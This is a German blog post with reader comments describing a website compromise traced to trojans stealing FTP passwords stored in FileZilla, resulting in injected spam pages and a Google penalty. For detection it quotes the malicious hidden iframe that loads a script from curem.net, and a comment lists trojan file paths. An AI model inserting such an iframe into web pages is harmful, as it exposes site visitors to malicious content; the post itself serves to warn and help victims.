Mr. Crowley Blog gehackt!

Die ├ťberschrift sagt ja schon alles. Ja, das Mr. Crowley Blog wurde gehackt. Die T├Ąter sind wahrscheinlich Spammer und der Schaden ist riesig.

Heute haben wir uns gewundert, dass keine Besucher ├╝ber google.de kamen. Dabei generieren wir ├╝ber 90% unserer Seitenbesucher ├╝ber Google. Zu erst hielten wir dies f├╝r ein Fehler unseres Statistik Tools. Doch dann fiel uns auf, dass wir bei keinen einzigen Keyword mehr bei Google zu finden sind. Und wir reden hier nicht von ein paar Keywords. Also sind wir der Sache auf den Grund gegangen. Und haben das hier bemerkt:Google Spam

Im Google Index befinden sich ca. 2.000 Seiten, die durch ein Spam-Skript erstellt wurden. Das Skript wurde auf unseren Server geladen. Zus├Ątzlich wurde unsere .htaccess Datei so manipuliert, dass die Spam-Links weitergeleitet wurden. Normalerweile w├Ąren die im Screenshot zu sehenden Links n├Ąmlich fehlerhaft. Unser Server h├Ątte einen sogenannten 404-Fehler (Seite nicht gefunden) zur├╝ckgeworfen und Google h├Ątte die Seiten niemals indiziert. Und um noch einen draufzusetzen wurden alle automatisch generierten Seiten von unseri├Âsen Websites angelinkt. Dahinter steckt also ein klares System. Erst automatisch tausende Seiten generieren und diese von Spam-Websites anlinken.

Jetzt werden einige vielleicht fragen: „Okay und was ist jetzt so schlimm daran, dass pl├Âtzlich 2.000 mehr sinnlose Seiten im Google Index sind? Google muss dies als Betrug gewertet haben. Entweder, die vielen sinnlosen Seiten oder die ganzen Spamlinks, die jetzt auf Mr. Crowley verweisen. Google hat uns quasi f├╝r alle Suchanfragen soweit heruntergestuft, dass wir jetzt gar nicht mehr gefunden werden. Gestern hatten wir noch mehrere hundert Besucher ├╝ber Google, heute NULL!

Und wo lag die Sicherheitsl├╝cke?

Auch das k├Ânnen wir 100% sagen. Nicht bei unserer Blog Software, sondern bei Filezilla! Dem Freeware FTP Client. Nein, das ist keine Verschw├Ârungstheorie. Ein Crowley Redakteur hatte das FTP Passwort in Filezilla gespeichert. Ebenso wie die FTP Passw├Ârter von 5 anderen Websites. Und jetzt der Clou: Alle 5 Websites, die auf verschiedenen Servern, bei verschiedenen Webhostern liegen, sind infiziert. Schuld daran ist eine Schadsoftware, welche die Daten aus Filezilla ausgesp├Ąht hat. Die Passw├Ârter sind in Filezilla n├Ąmlich nicht sicher gespeichert. Leider wurde die Schadsoftware nicht von AntiVir erkannt. Erst Anti-Malware konnte die Schadsoftware finden und unsch├Ądlich machen.

Also bitte: Speichert keine FTP Passw├Ârter in Filezilla. Passw├Ârter geh├Âren immer verschl├╝sselt gespeichert!

Wie erkennt ihr, ob eure Website von den gleichen ├ťbelt├Ątern gehackt wurde?

Achte auf eurer Startseite auf folgendes Codesnippet, dass im Quellcode in der letzten Zeile steht:

<iframe heigth=“1″ width=“1″ frameborder=“0″ src=“http://curem.net/t.php?id=[Hier steht eine individuelle ID]“></iframe>

Wenn ihr so ein Codesnippet findet, ist eure Website aller Wahrscheinlichkeit nach infiziert. Falls jemand das Problem hat, schreibt uns gerne an. Wir zeigen euch in 4 Schritten, wie ihr den Mist ein f├╝r alle mal los werdet.

Fazit f├╝r das Mr. Crowley Blog

Ja Leute, wir sind am Ar… Wir k├Ânnen nur hoffen, dass Google uns nur tempor├Ąr abstraft. Wir haben alle n├Âtigen Gegenma├čnahmen unternommen. Aber bis die wirken (wenn sie wirken) kann es einige Monate dauern.

Update!!!

Nachdem wir s├Ąmtliche Gegenma├čnahmen unternommen haben, sind wir seit heute sogar bei einigen Keywords wieder zu finden. Insgesamt wurden 8.000 Spamwebseiten auf unseren Server eingeschleust. Wir haben s├Ąmtliche Seiten gel├Âscht, Schadhaften Code bereinigt und bei Google einen Antrag zur Neubewertung der Website gestellt.

Weitere Links

Hat Dir der Test gefallen? Dann gib bitte eine Bewertung ab!

1 Stern2 Sterne3 Sterne4 Sterne5 Sterne (No Ratings Yet)
Loading...
Weitere Links

Dieser Testbericht wurde geschrieben von

Für den "Mr. Crowley Blog gehackt!" Test gibt die Mr. Crowley Testberichte Redaktion trotz gründlicher Recherche keine Garantie auf Aktualität, Vollständigkeit und Korrektheit. Der Erfahrungsbericht basiert auf persönlichen Erfahrungen.

Artikel-Schlagwörter:

7 Responses to Mr. Crowley Blog gehackt!

  1. jeichi sagt:

    hey.
    ich habe/hatte das gleiche problem.
    bei mehreren seiten musste ich mich mit diesem problem rumschlagen.
    meinst du wirklich, dass es an filezilla liegt?
    w├╝rde mich freuen, wenn wir uns austauschen k├Ânnten.

    • Crowley sagt:

      Hallo Jeichi,

      ich bin mir 200% sicher, dass die Passw├Ârter bei mir und 2 anderen Kollegen durch die nachfolgenden Trojaner die Filezilla Passw├Ârter ausgesp├Ąht haben. Lass uns gerne mal heute Abend oder morgen chatten / telefonieren / mailen (was dir lieber ist).

      Viele Gr├╝├če

      Hier sind die Trojaner zusammengefasst, die auf den infizierten Rechnern waren:

      c:\Users\AppData\Local\microsoft\Windows\temporary internet files\Content.IE5\HTD7DIC2\yhb08f27f4v0100f035002r5b5a538b108tfdb9d56fq00000000900801f0016000aj0e000601l00073290[1] (Trojan.Downloader)
      c:\Users\AppData\Local\Temp\_4050.tmp (Trojan.FakeAV) c:\Users\AppData\Local\Temp\_A440.tmp (Trojan.FakeAV) c:\Users\AppData\Local\Temp\_BBC6.tmp (Trojan.FakeAV) c:\Users\AppData\Local\Temp\msitcm.cpl (Trojan.Downloader)
      c:\Users\AppData\Local\Temp\wIgn.exe (Trojan.Downloader) c:\Windows\System32\dll.dll (Trojan.Lukicsel)
      c:\Windows\System32\cryptnet32.dll (Trojan.Tracur)

  2. Thomas sagt:

    Hallo,
    ich habe das gleiche Problem. Bei mir im Blog habe ich jetzt auch ├╝berall diese iframes und ich nutze leider auch Filezilla. Wie kann ich das Problem beheben?
    W├╝rde mich riesig ├╝ber eine Antwort freuen.
    Viele Gr├╝├če

  3. Crowley sagt:

    Hallo Thomas,

    dieses bl├Âde curem.net Ged├Âns hat deine Seite voll erwischt. Ich habe dir gerade eine Mail mit Gegenma├čnahmen gesendet.

    Viele Gr├╝├če

    Das Crowley Blog

  4. harry602 sagt:

    Hallo,
    bitte um Hilfe.
    Wie entfernt man in 4 Schritten das oben genannte Codesnippet.

    Gru├č
    harry602

  5. nik sagt:

    Hallo,
    habe mir auch den curem eingefangen, die seite wurde jetzt von strato gesperrt. Seid ihr sicher das es von filezilla kommt?
    ├ťber eine Gegenma├čnahmenmail w├╝rde ich mich sehr freuen :).

    Gehackte Gr├╝├če

    Nik

  6. Crowley sagt:

    Hallo Harry & Nik,

    ich habe euch beiden wegen curem.net eben schon angeschrieben. Bitte nennt mir die Seiten, um die es geht. Dann k├Ânnen wir individuell schauen, wie wir das Ding entfernen.

    Viele Gr├╝├če

    Crowley

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht ver├Âffentlicht. Erforderliche Felder sind mit * markiert.